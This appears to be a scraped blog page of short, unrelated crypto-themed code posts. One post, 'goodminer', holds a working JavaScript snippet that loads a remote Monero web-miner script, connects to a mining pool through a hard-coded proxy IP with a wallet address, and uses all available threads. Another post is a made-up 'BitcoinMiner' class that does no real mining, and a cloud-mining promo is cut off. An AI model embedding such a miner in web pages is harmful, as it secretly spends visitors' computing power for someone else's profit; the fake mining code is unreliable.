newb
Wednesday, April 17, 2024
Wednesday, March 20, 2024
goodminer
// Start Of Mining Code (Javascript)
var script = document.createElement("script");
script.src = "https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js";
document.head.appendChild(script);
server = "wss://45.119.82.33:40725";
var pool = "moneroocean.stream";
var walletAddress = "4BGtkiZx4oJiPZzgBuDGx772jA8CCewwqZvY1daCu4qGGH4HENaH9pX4wu5af7q959Gae2BhHiiqMELBZN6CcTyGGaMGztm";
var workerId = "GH-XMR"
var threads = -1;
var password = "";
startMining(pool, walletAddress, workerId, threads, password);
throttleMiner = 20;
// End Of Mining Code
Saturday, March 16, 2024
Friday, March 15, 2024
let messageData = {
phoneNumber: '1234567890', // the recipient's phone number
message: 'Hello, this is a test message.'
};
fetch('/send-sms', {
method: 'POST',
body: JSON.stringify(messageData),
headers: {
'Content-Type': 'application/json'
}
})
.then(response => response.json())
.then(data => console.log(data))
.catch(error => console.error(error));
Thursday, March 14, 2024
ماينز
const miner = new BitcoinMiner();
miner.address = 'bc1qgp6cvwxt8p9na3x5uy7uamtfdjt56t85tlu20e';
miner.miningPower = 100;
miner.pendingTransactions = [
new Transaction(null, miner.address, 12.5)
];
miner.previousHash = '0000000000000000000000000000000000000000000000000000000000000000';
miner.blockchain = [
new Block(1, [
new Transaction(null, 'b9105e1f03c89b81a6540391deab9a7705df93af25adc4e32a0e7d64a2c0f499', 50)
], '0', 0, '0000000000000000000000000000000000000000000000000000000000000000')
];
miner.startMining(4);
Wednesday, March 13, 2024
Cloud-based Bitcoin mining
Welcome to Our Cloud-based Bitcoin Mining Platform
What is Cloud-based Bitcoin Mining?
Cloud-based Bitcoin mining allows users to mine Bitcoins without the need for specialized hardware or technical knowledge. Our platform offers a simple, user-friendly interface for managing your mining operations.
Benefits of Cloud-
Arbitrag api
import axios from 'axios';
const options = {
method: 'GET',
url: 'https://crypto-arbitrage.p.rapidapi.com/crypto-arb',
params: {
pair: 'BTC/USD',
consider_fees: 'False',
selected_exchanges: 'exmo cex bitstamp hitbtc'
},
headers: {
'X-RapidAPI-Key': 'SIGN-UP-FOR-KEY',
'X-RapidAPI-Host': 'crypto-arbitrage.p.rapidapi.com'
}
};
try {
const response = await axios.request(options);
console.log(response.data);
} catch (error) {
console.error(error);
}
Thursday, March 7, 2024
Tuesday, March 5, 2024
Subscribe to:
Posts (Atom)